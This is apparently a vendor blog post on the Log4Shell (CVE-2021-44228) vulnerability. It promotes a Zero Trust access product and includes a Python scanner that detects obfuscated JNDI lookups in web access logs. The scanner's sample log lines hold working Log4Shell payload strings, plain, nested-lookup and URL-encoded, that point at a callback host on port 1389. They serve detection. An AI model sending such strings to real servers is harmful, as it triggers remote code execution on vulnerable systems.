Apache Log4j: Same Wolf, Different Vulnerability

By Tim Boivin

Yesterday, CISA launched a webpage and community-sourced repository of information and advisories regarding the Apache Log4j vulnerability that was discovered late last week.

The vulnerability (CVE-2021-44228, widely known as Log4Shell) affects Apache Log4j 2 library versions 2.0-beta9 through 2.14.1, which are embedded in a wide variety of consumer and enterprise services, websites, and applications, as well as in operational technology products, to log security and performance information. An unauthenticated remote actor could exploit this vulnerability to execute code on, and take control of, an affected system.

Widespread exploitation of this critical remote code execution (RCE) vulnerability has been under way since at least December 1st, according to news reports. It may look like yet another novel attack, but it really isn't. This is the same wolf, dressed up in a different vulnerability.
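A detection check a defender would want next to that advisory, added here as an example that is not part of the original post or of any PortSys product: CVE-2021-44228 fires when an attacker-controlled string carrying a JNDI lookup such as `${jndi:ldap://...}` is logged by a vulnerable Log4j, and attackers in the wild hide that string behind nested lookups (`${${lower:j}ndi:...}`, `${${::-j}ndi:...}`) and URL encoding. The scanner below resolves those layers the way Log4j would before matching, so the obfuscated payloads are caught and not only the textbook one. The access-log lines and the 203.0.113.5 callback host are constructed for the example.

```python
"""Log4Shell (CVE-2021-44228) scanner for web access logs.

Added example, not PortSys or Apache code. Attackers rarely send the plain
`${jndi:ldap://...}` string; they hide it with nested Log4j lookups such as
`${${lower:j}ndi:...}` or `${${::-j}ndi:...}` and with URL encoding. This
scanner resolves those layers the way Log4j would before it looks for the
JNDI lookup, so obfuscated payloads are caught. The log lines and the
203.0.113.5 callback host below are constructed for the example.
"""
import re
from typing import List, Tuple
from urllib.parse import unquote

# An innermost lookup: ${...} whose body holds no further braces.
_INNER = re.compile(r"\$\{([^{}]*)\}")
# Lookups we cannot (or must not) resolve are wrapped in sentinels so the
# resolution loop terminates; they are turned back into ${...} at the end.
_OPEN, _CLOSE = "\x00", "\x01"
_JNDI = re.compile(r"\$\{\s*jndi:", re.IGNORECASE)


def _resolve_inner(m: "re.Match[str]") -> str:
    body = m.group(1)
    head = body.strip().lower()
    if head.startswith("lower:"):          # ${lower:J} -> j
        return body.strip()[len("lower:"):].lower()
    if head.startswith("upper:"):          # ${upper:j} -> J
        return body.strip()[len("upper:"):].upper()
    if head.startswith("jndi:"):           # the payload itself: keep it
        return _OPEN + body.strip() + _CLOSE
    if ":-" in body:                       # ${env:NOPE:-j} or ${::-j} -> j
        return body.split(":-", 1)[1]      # unknown key falls back to default
    return _OPEN + body + _CLOSE           # ${date:...} etc.: leave as is


def normalize_lookups(text: str) -> str:
    """URL-decode, then collapse nested lookups to what Log4j would evaluate."""
    s = unquote(text)
    while True:
        resolved = _INNER.sub(_resolve_inner, s)
        if resolved == s:                  # no innermost lookup left
            break
        s = resolved
    return s.replace(_OPEN, "${").replace(_CLOSE, "}")


def scan_log(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line index, decoded JNDI payload) for every line carrying one."""
    hits: List[Tuple[int, str]] = []
    for i, line in enumerate(lines):
        decoded = normalize_lookups(line)
        m = _JNDI.search(decoded)
        if m:
            end = decoded.find("}", m.start())
            payload = decoded[m.start():end + 1] if end != -1 else decoded[m.start():]
            hits.append((i, payload))
    return hits


# Constructed access-log lines (Apache combined format); not real traffic.
SAMPLE_ACCESS_LOG = [
    '198.51.100.7 - - [10/Dec/2021:09:14:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Dec/2021:09:14:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.5:1389/a}"',
    '203.0.113.5 - - [10/Dec/2021:09:14:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.5:1389/a}"',
    '203.0.113.5 - - [10/Dec/2021:09:14:13 +0000] "GET /?x=%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2F203.0.113.5%3A1389%2Fa%7D HTTP/1.1" 400 0 "-" "curl/7.79.1"',
    '198.51.100.9 - - [10/Dec/2021:09:14:20 +0000] "GET /docs/jndi-tutorial HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for idx, payload in scan_log(SAMPLE_ACCESS_LOG):
        print(f"line {idx}: {payload}")
```

Run against the sample, lines 1, 2 and 3 are reported with the same decoded payload, while the benign request for `/docs/jndi-tutorial` is not, because a bare word is not a lookup. Unknown lookup types are left untouched rather than guessed at, so a log with `${date:...}` in it does not produce false positives.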

Consider the more publicized attacks, such as Stuxnet, SolarWinds Orion, GoldBrute, Hafnium Exchange, or Kaseya VSA. Or think about Equifax, JBS, Colonial Pipeline and Target – just to name a few of the dizzying array of well-known corporate victims over the past few years.

These increasingly sophisticated attacks continue to achieve their objectives, often without even requiring input from end users, whom many organizations still rely on as their first line of defense. 

With so many different applications exposed in today's perimeterless world, it's impossible for your IT team to keep up. They have to be experts on every IT security solution, stay current on the latest attacks, and test and roll out updates and patches in a very timely manner for every possible wolf that comes knocking at your door. And they have to stay on top of all this every day, all day.

It’s just not possible, even in the most well-funded IT organizations, to keep track. And that’s why these ravenous wolves keep getting in.

When will businesses learn? 

The question is, why? In this day and age, there simply isn't any reason you should leave your door wide open for these wolves to waltz right into your IT infrastructure and eat up your applications – not if you have proper authentication and access controls in front of them.

Our PortSys customers protect their infrastructure against these kinds of attacks with Total Access Control (TAC), a Zero Trust Access solution. TAC stops cold the exploitation of remotely exploitable vulnerabilities like this one in Apache Log4j, or those in VPN appliances, RDP and IoT devices – in fact, in any local, cloud, web services or supply chain solutions our customers rely on within their IT portfolio to conduct business – by keeping unauthenticated internet traffic from reaching them in the first place. That shrinks the exposure of a vulnerable Log4j instance; it does not remove the flaw itself, so the upgrades called for in CISA's advisories still need to go ahead.

That's because in today's perimeterless world, TAC makes resources (like applications that embed a vulnerable Log4j) invisible to the internet and protected by a combination of robust security policies, proper authentication and real-time, continuous evaluation of the context of access.

TAC’s evaluation of a user’s context of access incorporates multiple factors that go beyond username and password. TAC examines the device type, operating system, device security status, jailbreak or root status, whether antivirus is current, and more. TAC also leverages additional granular security policies to evaluate a user’s device, location, IP address, network connection and whether it is trusted or untrusted.

Hackers can’t attack what they can’t see

With TAC, your dozens of applications – and the vulnerabilities that may lie within them – aren't visible to the internet. They are all hidden – and protected – behind TAC, provided TAC is the only path to them: a forgotten direct listener reopens the exposure. That means attackers can't exploit these vulnerabilities to gain access to your infrastructure and then move laterally, install malware or ransomware, and exfiltrate data (including user credentials).

Yes, these attacks may seem like they are getting more sophisticated every day. That's because they are. But no, despite the media hype, this isn't anything new. These attacks will continue to evolve, continue to get more sophisticated, and continue to shut businesses down as they scramble to recover.

It doesn’t have to be that way. TAC’s Zero Trust Access approach means you can stop opening the door for these wolves. And TAC can be up and running in your infrastructure in days or weeks – not the months or years it frequently takes to implement other IT security solutions that aren’t as comprehensive in their approach. 

With TAC, you don’t have to be afraid of the big, bad wolves anymore.

Shrink your attack surface in today's perimeterless world with Total Access Control by PortSys.

Contact us at info@portsys.com or 781-996-4900 to quickly slam the doors shut on these wolves.